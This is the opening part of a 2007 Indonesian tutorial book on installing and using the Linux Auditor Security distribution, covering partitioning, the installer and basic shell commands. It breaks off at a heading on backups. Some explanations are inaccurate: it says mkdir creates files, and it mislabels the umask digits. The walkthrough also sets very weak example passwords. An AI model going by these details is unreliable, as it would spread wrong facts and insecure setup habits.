Copyright © 2007 hhan.wordpress.com . Herahadi A.N. (
[email protected])
Lisensi Dokumen: Copyright © 2007 hhan.wordpress.Com Seluruh dokumen di hhan.wordpress.com dapat digunakan, dimodifikasi dan disebarkan secara bebas untuk tujuan bukan komersial (nonprofit), dengan syarat tidak menghapus atau merubah atribut penulis dan pernyataan copyright yang disertakan dalam setiap dokumen. Tidak diperbolehkan melakukan penulisan ulang, kecuali mendapatkan ijin terlebih dahulu dari penulis hhan.wordpress.Com
Ucapan Terima Kasih Ucapan terima kasih penulis sampaikan kepada ibu dan bapak, kakak-kakakku, adik adik Dzaki Arsyan Qastari, Muhamad Faizul Fikri, dan Ulya Faizatun Nafi’ah. Penulis juga mengucapkan terimakasih kepada rekan-rekan penulis yang telah memberikan dukungan yang amat besar dalam menyelesaikan buku ini, teman-teman SKB50, Basz dan Ranu (nuke) atas download linux-nya, teman-teman sukabirus network, dotA’ers – BC’ers, rekan-rekan TE-2602, serta rekan-rekan Teknik Telekomunikasi ’02 STTTelkom. Penulis juga mengucapkan terima kasih untuk semua pihak yang telah banyak membantu penulis dalam penyelesaian buku ini.
i
Copyright © 2007 hhan.wordpress.com
KATA PENGANTAR Puji dan syukur penulis panjatkan ke hadirat Alloh SWT, atas berkatnya yang berlimpah telah memberi kesempatan kepada penulis untuk dapat menyelesaikan buku yang berjudul “Linux Auditor Security” ini. Buku ini disusun sebagai bagian dari keinginan penulis untuk berbagi sedikit ilmu yang penulis miliki dengan para pembaca, serta untuk lebih memasyarakatkan sistem operasi linux pada masyarakat indonesia. Pada penulisan buku ini digunakan sistem operasi linux auditor security dengan alasan lengkapnya tool – tool security yang disediakan, instalasi dan pengoperasian yang cukup mudah dan user friendly, serta sedikit atau bahkan belum adanya buku yang membahas secara kusus tentang distro yang satu ini. Semoga buku ini bermanfaat bagi para pembaca kususnya bagi para pemula untuk menentukan distro mana dari sekian banyaknya distro linux yang ada saat ini yang harus dipilih, serta bagi siapapun yang tertarik untuk mempelajari tool – tool security yang banyak sekali terdapat pada linux auditor security.
ii
Copyright © 2007 hhan.wordpress.com Akhir kata, penulis menyadari bahwa buku ini jauh dari sempurna, karena itu penulis berharap masukan, kritik dan saranya yang semoga membantu penulis dalam penyusunan buku selanjutnya. Jika sekiranya pembaca menjumpai masalah saat instalasi linux auditor security ataupun kurang mengerti atas penjelasan pada buku ini, silahkan mengirim e-mail ke
[email protected] atau melalui website di http://hhan.wordpress.com . Terima kasih.
Wassalam Herahadi A.N.
iii
Copyright © 2007 hhan.wordpress.com
DAFTAR ISI UCAPAN TERIMA KASIH ..............................................................I KATA PENGANTAR ...................................................................... II DAFTAR ISI ....................................................................................IV BAB 1.................................................................................................. 1 1.1 1.2
BAGIAN–BAGIAN SISTEM OPERASI LINUX ........................ 2 BAGIAN–BAGIAN PENTING KERNEL LINUX ....................... 3
BAB 2.................................................................................................. 4 2.1 2.2 2.3
Partisi Menggunakan Partition Magic ........................ 5 Partisi Menggunakan QTParted.................................. 7 Memulai Instalasi Melalui CDROM .......................... 11
BAB 3................................................................................................ 20 BAB 4................................................................................................ 37 4.1 4.2 4.3 4.4 4.5
Text Editor vi ............................................................. 38 Text Editor Pico ......................................................... 40 Text Editor Joe........................................................... 42 Text Editor mcedit...................................................... 45 Text Editor kwrite dan kate........................................ 46
BAB 5................................................................................................ 48 5.1 5.2 5.3 5.4
Administrasi Grub Sebagai Boot Loader................... 48 Administrasi User dan Group pada Linux ................. 57 Administrasi Proses Pada Linux................................ 66 Administrasi System Menggunakan “KControl”....... 73
BAB 6................................................................................................ 91 6.1 6.2 6.3
Tipe-Tipe File Pada System Operasi Linux ............... 93 Block Device Dan Character Device ......................... 94 Membuat Swap File ................................................... 98
iv
Copyright © 2007 hhan.wordpress.com BAB 7................................................................................................ 99 7.1 7.2 7.3 7.4 7.5 7.6 7.7
Memahami Jaringan Komputer ................................. 99 Pembagian Jenis-Jenis Jaringan Komputer ............ 101 Peralatan Jarigan .................................................... 106 IP Address................................................................ 114 Seting IP Address..................................................... 116 Mengaktifkan Samba................................................ 117 Mengakses File Sharing pada Jaringan .................. 124
BAB 8.............................................................................................. 126 8.1 8.2
Grafik ,Multimedia, Viewer dan Emulator .............. 126 Aplikasi Security ...................................................... 148
DAFTAR PUSTAKA..................................................................... 187
v
Copyright © 2007 hhan.wordpress.com
vi
Copyright © 2007 hhan.wordpress.com
BAB 1 SEKILAS TENTANG LINUX Linux merupakan system operasi open source yang merupakan unix clone, unix clone artinya bahwa linux disusun berdasarkan standart system operasi POSIX yang sebenarnya diturunkan berdasarkan fungsi kerja UNIX. UNIX sendiri merupakan pengembangan dari Multics (Multiplexed Computing Service) yang merupakan system operasi yang digunakan pada komputer – komputer mainframe untuk keperluan server jaringan. Multics sendiri merupakan satu-satunya system operasi yang memiliki fasilitas multi user di tahun1965-an. Secara umum Linux memiliki kemampuan bekerja lebih cepat dibandingkan dengan UNIX pada hardware yang sama lebih dari itu system operasi Linux bersifat free, berbeda dengan UNIX yang tidak bersifat free. Hal ini berdasarkan atas 3 azas panting dari FSF (Free Software Foundation) yang dipelopori oleh Richard M. Stallman bersama rekan-rekanya di MIT Labs. FSF sendiri merupakan sebuah corporate nonprofit yang mempromosikan free software dan menghilangkan pembatasan tentang proses distribusi serta modifikasi terhadap suatu produk software. Adapun ketiga azas tersebut adalah : 1. Dapat memperbanyak/menyalin GNU software dan menyebarluaskan secara bebas. 2. Boleh memodifikasi GNU software sejauh yang anda suka.
1
Copyright © 2007 hhan.wordpress.com 3. Boleh mendistribusikan versi pengembangan yang anda buat tanpa adanya bayaran apapun dari orang lain yang menggunakan software tersebut. Adapun fitur-fitur yang dimiliki linux antara lain adalah: • Multitasking dan mendukung 32 bit sehingga mampu menjalankan perintah secara bersamaan dalam satu waktu. • Multiprosesor, dapat berjalan/digunakan dihampir semua mesin, misalnya Intel, Mac, Sparc, dll. • Multiuser dan Multisession, dapat melayani beberapa user yang login secara bersamaan. • Virtual memory. • Shared libraries. • TCP/IP Networking. 1.1 Bagian–bagian Sistem Operasi Linux Sistem Operasi Linux/UNIX terdiri dari kernel, program sistem dan beberapa program aplikasi. Kernel merupakan interface antara hardware dengan system operasi dimana kernel sendiri merupakan sebuah inti dari sistem operasi yang mengatur penggunaan memori, piranti masukan keluaran, proses-proses, pemakaian file pada file system dan lain-lain. Kernel juga menyediakan sekumpulan layanan yang digunakan untuk mengakses kernel yang disebut system call. System call ini digunakan untuk mengimplementasikan berbagai layanan yang dibutuhkan oleh sistem operasi. Program sistem dan semua programprogram lainnya yang berjalan di atas kernel disebut user mode. Perbedaan mendasar antara
2
Copyright © 2007 hhan.wordpress.com program sistem dan program aplikasi adalah program sistem dibutuhkan agar suatu sistem operasi dapat berjalan sedangkan program aplikasi adalah program yang dibutuhkan untuk menjalankan suatu aplikasi tertentu. Contoh : daemon merupakan program sistem dan pengolah kata (word processor) merupakan program aplikasi. 1.2 Bagian–bagian Penting Kernel Linux Kernel Linux terdiri dari beberapa bagian penting, seperti : manajemen proses, manajemen memori, hardware device drivers, filesystem drivers, manajemen jaringan dan lain-lain. Namun bagian yang terpenting ialah manajemen proses dan manajemen memori. Manajemen memori menangani daerah pemakaian memori, daerah swap, bagian-bagian kernel dan untuk buffer cache. Manajemen proses menangani pembuatan prosesproses dan penjadwalan proses. Pada bagian dasar kernel berisi hardware device drivers untuk setiap jenis hardware yang didukung.
3
Copyright © 2007 hhan.wordpress.com
BAB 2 INSTALASI LINUX AUDITOR SECURITY Setelah mempelajari bab ini anda akan merasa begitu mudahnya instalasi linux auditor security, semudah anda menginstal Windows yang hanya klik “next” dan “finish”, begitu pula instalasi linux auditor security, bahkan sebenarnya linux auditor security tidak memerlukan instalasi untuk bisa dijalankan pada komputer anda karena linux auditor security yang bersifat live cd, artinya anda dapat menjalankan sistem operasi linux auditor security langsung dari cd seperti halnya knopix yang tanpa harus menginstallnya di hardisk. Sebelum anda melakukan instalasi linux auditor security pada hardisk anda, diperlukan sebuah partisi kusus sebagai tempat penyimpanan instalasi. Partisi ini dapat dibuat menggunakan Partition Magic jika sebelumnya komputer anda telah terinstal windows, namun jika komputer anda belum terinstal windows linux auditor security telah menyediakan sebuah tool partisi yang disebut QTParted, anda bisa menggunakan tool ini untuk mempartisi hard disk anda. Linux auditor security membutuhkan partisi minimal sebesar 1 GB untuk instalasi dan 128 MB untuk swap jika komputer anda memiliki memory kurang dari 256 MB, dalam hal ini penulis tidak menyediakan partisi kusus
4
Copyright © 2007 hhan.wordpress.com untuk swap. Nantinya kita akan membuat swap file tersendiri yang berada satu partisi dengan partisi linux auditor security. 2.1 Partisi Menggunakan Partition Magic Sebelumnya tentu saja harus terinstall partition magic pada komputer anda dan penulis mengasumsikan bahwa anda sudah bisa menginstall partition magic pada komputer anda, dalam hal ini penulis menggunakan partition magic 8.0. pada windows XP. Untuk memulainya langkah – langkahnya adalah seperti berikut ini : ¾ Klik start menu Æ All Program Æ Powerquest Partition Magic 8.0 Æ Partition Magic 8.0
Gambar 2.0 Menjalankan Partition Magic 8.0
5
Copyright © 2007 hhan.wordpress.com Setelah partition magic dijalankan maka akan disuguhi tampilan window dari partition magic 8.0 yang meberikan informasi dari partisi hard disk kita secara visualisasi. ¾ Buat sebuah partisi sebagai primary partition dengan tipe Linux Ext3. dalam hal ini penulis membuat sebuah partisi sebesar 4 GB. Untuk lebih jelasnya bisa dilihat pada gambar 3.1 di bawah ini.
Gambar 2.1 Membuat partisi linux ¾ Klik ok Æ apply Setelah proses pembuatan partisi selesai maka semua persiapan untuk instalasi linux auditor security telah selesai dan instalasipun bisa dimulai.
6
Copyright © 2007 hhan.wordpress.com
2.2 Partisi Menggunakan QTParted Untuk bisa menggunakan QTParted anda harus menjalankan linux auditor security terlebih dahulu, karena linux auditor security belum terinstal pada hard disk maka kita dapat menjalankanya secara live, mengenai cara menjalankan linux auditor security secara live dapat dilihat pada sub bab “Memulai instalasi melalui CDROM” yang akan dibahas setelah sub bab ini. Sebelum memulai penggunakan QTParted, ada baiknya anda memahami bagaimana linux mengorganisasi peralatan IDE-nya. Hardisk dan CDROM merupakan peralatan atau controller IDE. Mainboard pada umumnya memiliki 2 port IDE. Kabel IDE terdiri dari 3 buah konektor, ini berarti bahwa 1 kabel IDE yang ditancapkan di mainboard dapat dihubungkan dengan ke dua peralatan IDE sekaligus sehingga jika 2 kabel IDE dipasang maka diperoleh maksimal 4 peralatan IDE. Linux merupakan sebuah sistem operasi yang berazaskan “everything is file”, yang artinya adalah pada linux semua peraltan ditangani sebagai file. Untuk peralatan IDE diwakili oleh hdXY pada direktori /dev , dimana nilai X ditentukan sebagai berikut : a :controler IDE pertama master, primary master, pada umumnya adalah hardisk. b :controler IDE pertama slave, secondary master, pada umumnya adalah hardisk kedua atau bisa juga CDROM. c :controller IDE kedua master, secondary master. d :controller IDE kedua slave, secondary slave.
7
Copyright © 2007 hhan.wordpress.com Sedangkan Y merupakan penomoran secara logis dari partisi hard disk. Penomoran ini menggunkan bilangan integer dimulai dari bilangan 1 untuk partisi pertama, 2 untuk partisi ke-2 dan seterusnya. Setelah konsep di atas dapat anda pahami maka penggunakan QTParted akan lebih mudah. Untuk memulai pemartisian hard disk menggunakan QTParted langkah – langkahnya adalah seperti berikut ini : ¾ Klik start menu > QTParted
Gambar 2.2 Menjalankan QTParted melalui start menu QTParted bisa juga dijalankan melalui console dengan mengetikan perintah seperti berikut ini : root@hhan:~# qtparted
8
Copyright © 2007 hhan.wordpress.com Setelah beberapa detik maka jendela QTParted akan muncul seperti pada gambar 3.3 dibawah ini dan QTParted siap digunakan.
Gambar 2.3 jendela utama QTParted ¾ Klik /dev/hda akan muncul visualisasi dari partisi hard disk seperti halnya pada partition magic.
Gambar 2.4 visualisasi partisi pada QTParted
9
Copyright © 2007 hhan.wordpress.com
¾ Klik kanan /mnt/hda3 Æ &Format
Gambar 2.5 Format partisi Tentukan tipe file system dari partisi /dev/hda3, dalam hal ini penulis menggunakan reiserfs sebagaimana terlihat pada gambar dibawah ini.
Gambar 2.6 Jendela format partition Setelah tipe file system dari ditentukan kemudian klik ok Æ &commits.
partisi file Æ
10
Copyright © 2007 hhan.wordpress.com
2.3 Memulai Instalasi Melalui CDROM
Instalasi linux auditor security dapat dilakukan melalui CDROM, artinya semua paket yang ingin diinstall berada pada 1 atau lebih CDROM. Untuk melakukan instalasi dari CDROM sebelumnya ubah setting BIOS sehingga CDROM menjadi media boot yang pertama. Setelah setting BIOS selesai masukan CD Linux Auditor Security dan restart komputer anda, maka akan tampak tampilan awal berupa boot menu yang akan nampak seperti pada gambar 3.2 berikut ini:
Gambar 2.7 Boot menu Linux Auditor Security Boot menu tersebut memberikan pilihan mengenai resolusi yang ingin anda gunakan, sesuaikan resolusi yang anda gunakan dengan kemampuan hardware anda, dalam hal ini penulis menggunakan resolusi 1024x768. Setelah anda memutuskan untuk menggunakan resolusi mana yang sesuai dengan hardware pada komputer anda, tuliskan angka yang menunjukan pilihan anda
11
Copyright © 2007 hhan.wordpress.com kemudian tekan enter. Tunggu beberapa saat dan kemudian Linux Auditor Security telah berjalan pada komputer anda secara live. Anda sudah dapat menjalankan linux auditor security secara live, sekarang saatnya instalasi linux auditor security pada hard disk. Berikut ini adalah langkah instalasi yang dapat dilakukan: ¾ Klik start menu > system > auditor HD instaler Atau bisa juga melalui console mengetikan perintah berikut ini :
dengan
root@hhan:~# IGNORE_CHECK=1 sudo knoppixinstaller
Setelah perintah tersebut dijalankan kita akan dihadapkan pada tampilan window seperti berikut ini :
Gambar 2.8 Tampilan awal auditor instalation
12
Copyright © 2007 hhan.wordpress.com ¾ Klik ok Sesaat kemudian muncul window kanotix main menu.
Gambar 2.9 Kanotix main menu ¾ Pilih menu 2. Start instalation Æ ok
Gambar 2.10 Choose partition Pilih partisi tempat linux auditor security ingin di install, dalam hal ini /dev/hda3. Kemudian klik Next.
13
Copyright © 2007 hhan.wordpress.com
Gambar 2.11 Memilih tipe file system Kotak dialog ini meminta anda untuk menentukan file system dari partisi linux anda seperti halnya pada saat penggunakan QTParted, pilih reiserfs kemudian klik next. ¾ Pilih reiserfs Æ next Setelah kotak dialog file system akan muncul kotak dialog surname seperti dibawah, yang perlu digaris bawahi disini, surname bukan merupakan user name.
Gambar 2.12 Input surname Masukan surname untuk user misalnya “herahadi”, surname nantinya akan ditampilkan pada kotak dialog username sesaat sebelum login pada linux auditor
14
Copyright © 2007 hhan.wordpress.com security. Setelah tombol next anda klik, anda akan dihadapkan pada sebuah window yang meminta anda untuk menentukan username non root. User name ini akan digunakan untuk login selain root. Masukan usernamenya “hhan” kemudian klik next. ¾ Ketikan hhan Æ next
Gambar 2.13 kotak dialog user name ¾ Next Selanjutnya anda akan diminta untuk memberikan nilai pada kotak dialog user password. Masukan “hhan” (tanpa tanda petik) sebagai password untuk user “hhan” kemudian klik next.
15
Copyright © 2007 hhan.wordpress.com
Gambar 2.14 kotak dialog password user Setelah password untuk user hhan, kini kita akan diminta untuk memasukan password root. Masukan kata kunci “rahasia” untuk password root.
Gambar 2.15 kotak dialog password administrator (root) ¾ Klik next
16
Copyright © 2007 hhan.wordpress.com Masukan hostname anda, penulis mengisikan “hhan” untuk hostname, kemudian klik next.
Gambar 2.16 Kotak dialog hostname
¾ Klik next Disini kita diminta untuk menentukan dimana kita akan menaruh boot loader (grub) akan diinstalkan. Terdapat dua pilihan mbr (master boot record) dan partition (root partition). Pilih mbr kemudian klik next.
Gambar 2.17 Kotak dialog grub ¾ Pilih mbr (master boot record) Æ next
17
Copyright © 2007 hhan.wordpress.com Setelah menentukan dimana boot loader akan kita instalkan akan muncul sebuah kotak dialog yang akan memproses semua konfigurasi yang sudah kita buat. Klik next untuk memulai instalasi, yakinkan konfigurasi anda sudah benar karena setelah anda menekan tombol next, partisi /dev/hda3 akan diformat.
Gambar 2.18 Kotak dialog untuk memulai proses
18
Copyright © 2007 hhan.wordpress.com
Gambar 2.19 Prosentase proses setelah proses selesai maka anda akan dibawa pada dialog bok yang meminta anda memasukan disket untuk digunakan sebagai rescue disk. Pilih “no” dan instalasi linux auditor security telah selesai.
Gambar 2.20 Kotak dialog rescue disk Kini komputer anda telah terinstal linux auditor security secara permanen. Untuk memastikanya reboot komputer anda, ambil cd instaler linux auditor security dari dalam CDROM , dan ubah setting BIOS kekondisi awal. Saat pertama kali booting kita akan dihadapkan pada GRUB menu yang terdiri dari pilihan sistem operasi yang ingin dijalankan. Menu tersebut kurang lebih seperti berikut ini: Debian GNU/Linux, kernel 2.6.11-auditor-10 Default Debian GNU/Linux, kernel 2.6.11-auditor-10 Windows 2K/XP/2003 (hda1)
19
Copyright © 2007 hhan.wordpress.com Arahkan cursor pada pilihan Debian GNU/Linux, kernel 2.6.11-auditor-10, kemudian tekan enter. Setelah beberapa saat akan muncul kotak dialog login. Terdapat dua pilihan login, login sebagai administrator (root) atau login sebagai user biasa (hhan). Untuk lebih amanya, pilih login sebagai user biasa (hhan). Klik “hhan” isikan passwordnya “hhan” kemudian klik login. Kini anda sudah berhasil masuk pada GUI linux auditor security.
BAB 3 PERINTAH DASAR LINUX Pada bagian ini kita akan mempelajari perintah – perintah dasar pada sistem GNU/Linux yang sering diperlukan dalam administrasi sebuah sistem linux. Untuk menuliskan/menjalankan perintah – perintah pada linux kita dapat menggunakan linux console. Untuk menjalankan console caranya adalah klik start menu Æ system Æ konsole (terminal program), kemudian akan muncul sebuah window untuk mengetikan perintah seperti terlihat di bawah ini :
20
Copyright © 2007 hhan.wordpress.com
Gambar 3.0 Konsole interface Atau cara lain untuk mengetikan perintah – perintah linux adalah dengan tanpa menggunakan xwindow, hal ini tentu saja memberikan suatu kelebihan tersendiri dibandingkan dengan menggunakan console yang membutuhkan xwindow, yaitu penghematan pada memory komputer. Cara untuk memulainya adalah dengan menekan Ctrl+Alt+F1 pada saat anda pada lingkungan xwindow, kemudian anda akan dibawa pada lingkungan tempat mengetikan perintah – perintah linux tanpa xwindow. Untuk berpindah dari console yang satu ke console lainya anda dapat menekan Alt+Fn dimana n merupakan bilangan dimulai dari angka 1 sampai 6, untuk kembali ke lingkungan xwindow lagi anda bisa menekan tombol alt+f7. Struktur umum perintah – perintah pada GNU/Linux adalah seperti berikut ini : hhan@hhan:~$ perintah [option(s)] [argument(s)]
Dimana:
21
Copyright © 2007 hhan.wordpress.com $ adalah tanda yang mengindikasikan bahwa anda bekerja sebagai user biasa. Terdapat dua simbol yaitu $ untuk user biasa dan # untuk root.pada sistem GNU/Linux terdapat dua macam jenis perintah dipandang dari privileges-nya yaitu perintah yang harus dijalankan dengan menggunakan user root (membutuhkan root privileges) dan perintah yang bisa dijalankan tanpa user root (tanpa root privileges). Perintah – perintah perintah yang membutuhkan root privileges biasanya adalah perintah – perintah untuk mengakses suatu hardware misalnya hard disk, ethernet,dll. Perintah adalah perintah – perintah GNU/Linux yang ingin dieksekusi. Options(s) adalah atribut – atribut perintah yang memberikan output sesuai dengan yang user inginkan. Argument(s) adalah argument – argument yang dibutuhkan oleh perintah dalam menjalankan fungsinya. Tanda “[“ dan “]” adalah tanda yang berarti option atau argument di dalamnya bersifat tidak harus diikut sertakan. Sedangkan jika option atau argument didalamnya harus diikut sertakan saat eksekusi perintah, tandanya adalah “<” dan “>”. Perlu diingat bahwa tanda “[“ dan “]” atau “<” dan “>” tidak dituliskan saat eksekusi perintah, tanda tersebut dibuat hanya untuk mempermudah pembaca dalam memahami penulisan perintah – perintah.
22
Copyright © 2007 hhan.wordpress.com Berikut ini perintah - perintah GNU/Linux yang sering diperlukan: •
dasar
pada
Melihat Direktori Aktif
Untuk melihat direktori aktif saat ini kita dapat menggunakan perintah pwd. Penulisan perintahnya adalah seperti berikut: hhan@hhan:~$ pwd
Dengan perintah diatas maka user akan mengetahui dimana direktori tempat dia sedang bekerja (aktif) saat ini. •
Menggunakan Telnet
Merupakan sebuah aplikasi yang digunakan untuk melakukan login dan mendapatkan akses dari komputer lain, adapun perintahnya adalah sebagai berikut : hhan@hhan:~$ telnet <destination IP>
Option “destination IP” merupakan alamat IP dari komputer tujuan. •
Mematikan System
root@hhan:~# poweroff
atau root@hhan:~# /sbin/poweroff
23
Copyright © 2007 hhan.wordpress.com Perintah ini komputer. •
dipakai
untuk
mematikan
sistem
Membuat Direktori
hhan@hhan:~$ mkdir [OPTION] DIRECTORY(s)
Option dapat kita isi dengan : -m untuk memberikan permission mode. -v untuk verbose, yaitu sistem akan menuliskan proses yang sedang dilakukan. Perintah ini digunakan untuk membuat suatu direktori. Misalnya adalah sebagai berikut: hhan@hhan:~$ mkdir file1
Perintah ini akan menghasilkan sebuah file dengan nama file1. Sedangkan untuk membuat banyak file sekaligus perintah mkdir dapat dimodifikasi seperti berikut ini: hhan@hhan:~$ mkdir file1 file2 file3 file4
Perintah diatas akan menghasilkan 4 file sekaligus dengan nama file1, file2, file3, dan file4. •
Menghapus Sebuah File/Direktory
Perintah yang dipakai untuk Menghapus suatu direktory adalah seperti berikut. hhan@hhan:~$ rm [OPTION] FILE
Beberapa option yang ada adalah sebagai berikut :
24
Copyright © 2007 hhan.wordpress.com -r, -R, --recursive adalah recursive yang berarti, perintah tersebut akan menjalankan fungsinya secara recursive. -v, --verbose. -f, --force yang berarti perintah akan mengabaikan jika ternyata file yang ingin di delete tidak ada. Contoh penggunakan perintah rm seperti dibawah: hhan@hhan:~$
rm –rvf file1
Perintah diatas akan menghapus sebuah file yang bernama nama file1 beserta semua isi didalamnya. •
Menggunakan Perintah Find
Perintah find digunakan untuk mencari suatu file dalam hirarki sebuah direktori. Penggunakan perintah find terlihat seperti di bawah: hhan@hhan:~$ find ./ -name “*fileku*” -print
Maksud dari perintah tersebut adalah sebagai berikut : Cari file pada direktori aktif (direktori saat ini sedang bekerja) dengan nama apa saja yang mengandung kata “fileku” ditengahnya, kemudian hasilnya di tampilkan pada standart output (monitor). Tanda “*” (tanpa tanda petik “) berarti karakter apa saja yang mengikutinya. •
Memformat Floppy Disk
25
Copyright © 2007 hhan.wordpress.com Untuk memformat sebuah floppy disk secara low level format dapat menggunakan perintah fdformat. Penggunaan perintahnya seperti berikut ini: root@hhan:~# fdformat /dev/fd0H1440
•
Melakukan Mount dan Umount
Device – device pada linux seperti hard disk, floppy disk, flash disk, CDROM, dsb, sebelum siap untuk digunakan harus di-mount terlebih dulu. Device – device tersebut tidak akan bisa difungsikan sebagaimana fungsinya sebelum dimount terlebih dahulu. Adapun syntax dari perintah mount adalah: root@hhan:~# mount <device> <destination file>
-
device : merupakan device yang ingin di-mount destination file : file tujuan tempat mount device diletakan.
Contoh penggunakan berikut : root@hhan:~#
syntax
tersebut
seperti
mount /dev/hda5 /mnt/d
Maksud dari perintah di atas adalah sebagai berikut: mount partisi hardisk hda5 ke direktori /mnt/d, jadi untuk melakukan operasi baca tulis pada device hda5 anda dapat melakukanya dengan mengakses direktori /mnt/d .Sebelum melakukan mount pastikan bahwa direktori /mnt/d telah disediakan.
26
Copyright © 2007 hhan.wordpress.com Adapun daftar device pada linux adalah sebagai berikut: /dev/cdrom /dev/eth0 /dev/eth1 /dev/fd0 /dev/sda1 /dev/hda1 /dev/hdb1
CD-ROM Card ethernet pertama Card ethernet kedua Floppy Flash disk partisi pertama hardisk master partisi pertama hardisk secondary
Sebenarnya pada linux auditor security anda tidak perlu mount terlebih dahulu untuk mengakses suatu drive jika anda login sebagai root, karena linux auditor security telah menuliskan konfigurasinya pada fstab yang akan di load saat pertama kali booting. fstab atau file system table merupakan sebuah file konfigurasi yang dipakai untuk mendeskripsikan daftar – daftar device yang akan di-mount oleh system secara otomatis pada saat pertama kali booting. File fstab terletak pada direktori etc. Berikut ini merupakan contoh isi dari file fstab pada linux auditor security : # /etc/fstab: filesystem table. # # filesystem mountpoint type options dump pass /dev/hda3 / reiserfs defaults 0 1 proc /proc proc defaults 0 0 /dev/fd0 /floppy vfat defaults,user,noauto,showexec,umask=022 0 0 usbfs /proc/bus/usb usbfs devmode=0666 0 0 sysfs /sys sysfs defaults 0 0 tmpfs /dev/shm tmpfs defaults 0 0
27
Copyright © 2007 hhan.wordpress.com /dev/cdrom /cdrom iso9660 defaults,ro,users,noexec,noauto 0 0 # Added by KNOPPIX /dev/hda1 /mnt/hda1 ntfs noauto,users,exec,ro,umask=000 0 0 # Added by KNOPPIX /dev/hda5 /mnt/hda5 vfat noauto,users,exec,umask=000,quiet 0 0 Perlu untuk dipahami bahwa konfigurasi fstab terdiri dari 6 buah field yang tiap fieldnya dipisahkan dengan tab, masing – masing field meiliki arti seperti berikut ini : 1. Field I merupakan informasi tentang hardware fisik kita. 2. Field II merupakan informasi mengenai dimana kita akan menaruh device hasil mount. 3. Field III merupakan tipe dari file system dari device yang ingin di-mount. Misalkan reiserfs, ext2, ataupun ext3 untuk linux, vfat dan ntfs untuk windows. 4. Field IV digunakan untuk memberikan option dari field III. umask digunakan untuk setting mode kepemilikan, setting ini terdiri dari 3 digit. Digit pertama digunakan untuk setting hak akses dari root, digit kedua untuk setting hak akses dari group root, kemudian digit ketiga untuk setting hak akses dari group lain. Adapun tiap digitnya merupakan susunan dari 3 angka biner. Bit pertama untuk setting read, bit kedua write, dan bit ketiga untuk execute. Untuk lebih jelasnya bisa dilihat dibawah ini :
0 read
0 0 write execute 28
Copyright © 2007 hhan.wordpress.com Yang perlu diingat disini bahwa bit “0” berarti mode aktif, sedangkan bit “1” berarti sebaliknya. Jadi misalkan kita ingin membuat suatu mode dimana tidak ada user lain selain root yang dapat mengaksesnya, maka umask dapat dituliskan seperti berikut ini : umask=077 Arti dari angka 077 diatas adalah : 0 = root mempunyai hak untuk melakukan read, write , execute. 7 = group untuk root tidak mempunyai hak untuk melakukan apa – apa. 7 = group lainya tidak mempunyai hak untuk melakukan apa – apa. noauto atau auto digunakan untuk menentukan apakah device yang bersangkutan akan di-mount secara otomatis saat pertama kali booting atau tidak. Option auto bila ingin dimount secara otomatis, dan noauto untuk sebaliknya. 5. field V terdiri dari angka “0” atau angka “1”. Gunakan angka “0” jika anda tidak membackup mounting, dan gunakan angka “1” jika anda melakukan backup mounting. Untuk nilai defaultnya adalah angka “0”. 6. field VI terdiri dari satu digit yang merupakan salah satu angka diantara “0”,”1”, atau “2”. Gunakan angka “1” jika digunakan untuk sistem file
root (/), angka “2” untuk sistem lain, dan angka “0” untuk nilai default.
29
Copyright © 2007 hhan.wordpress.com Jadi misalkan diinginkan drive hda5 ingin di-mount secara otomatis saat pertama kali booting dengan hak akses hanya root yang diijinkan untuk read, write, dan execute, maka file konfigurasi pada fstab dapat dituliskan seperti berikut (gunakan tombol tab untuk memisahkan masing – masing field) : dev/hda5
/mnt/hda5
vfat
auto,umask=077
00
Sedangkan untuk melakukan umount syntax-nya tidak jauh berbeda dengan syntax untuk mount. Jadi untuk melakukan umount pada drive /hda5 perintahnya adalah : root@hhan:~# umount /dev/hda5
Sedikit berbeda dengan mount, perintah umount hanya membutuhkan satu buah parameter yaitu berupa nama device yang ingin di-umount, letak dimana device tersebut di-mount tidak diperlukan saat melakukan umount.
•
Mematikan Sebuah Proses
Untuk mematikan sebuah proses yang sedang berjalan kita dapat menggunakan perintah kill. Penulisanya seperti berikut root@hhan:~#
kill
PID merupakan no urut dari suatu proses yang sedang berjalan. Untuk melihat PID suatu proses dapat dilakukan dengan perintah ps aux yang akan
30
Copyright © 2007 hhan.wordpress.com dibahas nantinya. Misalkan dari hasil menjalankan perintah ps aux diketahui sebagai berikut : hhan 3376 0.0 4.0 23336 10384 ? S 20:15 0:00 kdeinit: kio_file file /tmp/ksocket-h hhan 3392 0.5 7.0 29380 18100 ? S 20:15 0:01 kdeinit: kwrite /mnt/hda5/TakeThePoin hhan 3394 0.1 5.4 25564 14024 ? S 20:15 0:00 kdeinit: kio_uiserver hhan 3395 0.0 4.0 23068 10320 ? S 20:15 0:00 kdeinit: kio_file file /tmp/ksocket-h hhan 3399 0.0 4.6 24176 11936 ? SN 20:16 0:00 kdeinit: kio_thumbnail thumbnail /tmp root 3438 4.1 2.6 32316 6760 pts/1 Sl 20:19 0:00 xmms root 3441 0.0 0.3 2564 856 pts/1 R+ 20:19 0:00 ps aux
Dari daftar diatas terlihat bahwa xmms memiliki PID 3438, maka untuk mematikan prosesnya dapat digunakan perintah seperti berikut ini : root@hhan:~#
•
kill 3438
Perintah “mesg”
Perintah yang digunakan untuk memberikan ijin user lain menampilkan pesan dilayar terminal kita. Penulisanya sebagai berikut: hhan@hhan:~$ mesg y
atau
31
Copyright © 2007 hhan.wordpress.com hhan@hhan:~$ mesg n
Option y berarti ijin menulis pada terminal anda diijinkan, sedangkan option n berarti sebaliknya yaitu ijin menulis pada terminal anda tidak diijinkan untuk user lain. •
Perintah “talk”
Digunakan untuk mengadakan percakapan melalui terminal, input dari terminal anda akan disalin di terminal user lain, begitu juga sebaliknya, aplikasi ini menyerupai chatting. Untuk menjalankanya perintahnya adalah sebagai berikut : hhan@hhan:~$ talk ID_tujuan@IP_tujuan
ID_tujuan merupakan user name pada komputer yang ingin dituju. IP_tujuan merupakan alamat IP dari komputer yang ingin dituju. Jadi misalkan anda ingin mengadakan percakapan pada user “orochimaru” yang memiliki IP 192.168.0.123 maka perintahnya akan seperti berikut ini. hhan@hhan:~$ talk [email protected]
•
Perintah “more”
Perintah yang digunakan untuk menampilkan is file layar perlayar. hhan@hhan:~$ more
32
Copyright © 2007 hhan.wordpress.com Perintah ini akan menmpilkan isi file layar per layar, untuk melakukan scroll dapat menggunakan tombol page down dan page up. Misal kita ingin melihat isi file /etc/fstab , maka perintahnya adalah sebagai berikut : root@hhan:~# more /etc/fstab
•
Melakukan Back Up File
